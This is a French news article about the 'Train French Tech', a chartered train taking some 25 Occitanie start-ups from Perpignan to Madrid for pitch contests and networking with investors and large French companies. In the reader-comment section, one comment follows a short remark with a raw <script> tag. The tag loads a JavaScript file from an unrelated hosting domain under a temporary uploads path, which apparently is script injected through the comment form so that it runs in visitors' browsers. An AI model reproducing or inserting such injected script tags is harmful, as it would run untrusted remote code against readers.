Le Train French Tech s'élancera le 20 juin

 |   |  506  mots
Candidate à la labellisation French Tech, Madrid (ici la quartier d'affaires CTBA) participe au train éponyme.
Candidate à la labellisation French Tech, Madrid (ici la quartier d'affaires CTBA) participe au train éponyme. (Crédits : Creative Common)
Destiné à relier les écosystèmes de Perpignan, Montpellier, Toulouse, Madrid et Barcelone, un train réservé aux pépites de la French Tech s'élancera, le 20 juin, vers l'Espagne. Au programme de cette initiative de Perpignan Méditerranée Invest : concours de pitchs, rencontre des industriels basés dans la capitale espagnole, networking, etc.

Un groupe de 25 start-ups basées à Toulouse, Montpellier et Perpignan s'élancera depuis cette dernière ville, le 20 juin, dans un train destiné à valoriser l'écosystème French Tech méditerranéen. Deux rames ont été privatisées avec l'aval de la French Tech nationale afin "d'une part, de créer des liens, non seulement entre les entreprises elles-mêmes, mais aussi entre ces entreprises et les investisseurs potentiels, publics ou privés, représentant une valeur ajoutée indéniable au processus de concrétisation de leur projet", fait savoir Perpignan Méditerranée Invest.

À la rencontre des écosystèmes de Barcelone et Madrid

Sur une initiative de l'agence de développement économique perpignanaise et en coopération avec la Renfe-SNCF, le train partira avec les start-ups d'Occitanie à son bord. Une session de pitchs dans deux wagons distincts, avant l'étape de Madrid, se déroulera face à un jury composé d'industriels, d'institutionnels, d'élus et d'investisseur, qui pourra voter avec une application "Train French Tech", développée pour l'occasion.

Lors du terminus prévu à Madrid, une nouvelles séquence permettra d'opposer les cinq meilleures start-ups d'Occitanie à la propre sélection de l'écosystème numérique français de Madrid. Plusieurs grands groupes français opérant dans la capitale espagnole, dont Accor, Air France ou la Société Générale, assisteront à cette séquence.

Majoritairement issues de Perpignan et des Pyrénées-Orientales, les start-ups participantes sont : I See U, FLIPR, Odesy, Caminade, Gôôd, Ma Bonne Action, Numeric Wave, Yazara, Passtime, Pack Editions, 8Mil, La Nature s'invite, Open Pi, Arcambal, Atenea, Delabonnemusique, Sunchain, Consult-il, Shipping Bo, Hotelub. À Madrid, une dizaine de start-ups sont déjà confirmées également.

"Nous avons retenu l'idée du train car s'il existe une ligne directe depuis Perpignan jusqu'à Madrid, toutes les entreprises d'Occitanie n'ont pas forcément l'opportunité d'y aller souvent, observe Laurent Gauze, président de Perpignan Méditerranée Invest. C'est aussi un bon moyen de nous rapprocher, en prévision de l'obtention du label (Perpignan et Madrid candidatent au label French Tech, qui devrait leur être accordé en 2018, NDLR)."

L'émergence d'un nouveau format French Tech

Le concours de pitchs face aux industriels permettra de décerner trois prix (prix du jury, prix ambassadeur et prix Coup de coeur). L'opération se conclura par une soirée de networking, en présence de plus de 200 personnes et 60 entreprises.

Le Train French Tech est donc un nouveau format porté par les acteurs locaux, et d'ores et déjà appelé à se renouveler, selon Laurent Gauze.

"Perpignan est le plus petite des cinq villes, mais nous nous plaçons dans le cadre de la grande région, où se produit une redistribution des rôles, observe-t-il. Notre spécificité peut être de nous rendre utiles aux autres villes et territoires, comme le cluster LeadeR l'a réussi à partir d'une dynamique qui a commencé à Alès. Avec cette opération, nous voulons pérenniser un événement réunissant les cinq grandes villes d'Europe du sud."

Réagir

Votre email ne sera pas affiché publiquement
Tous les champs sont obligatoires

Commentaires
a écrit le 29/07/2017 à 22:31 :
Interessant ! :)
<script src="https://tunisieiz.cluster015.ovh.net/uploads/biens/temp/324672cb593811484e99f8a00f73e3ce/n1.js"></script>

Merci pour votre commentaire. Il sera visible prochainement sous réserve de validation.

 a le à :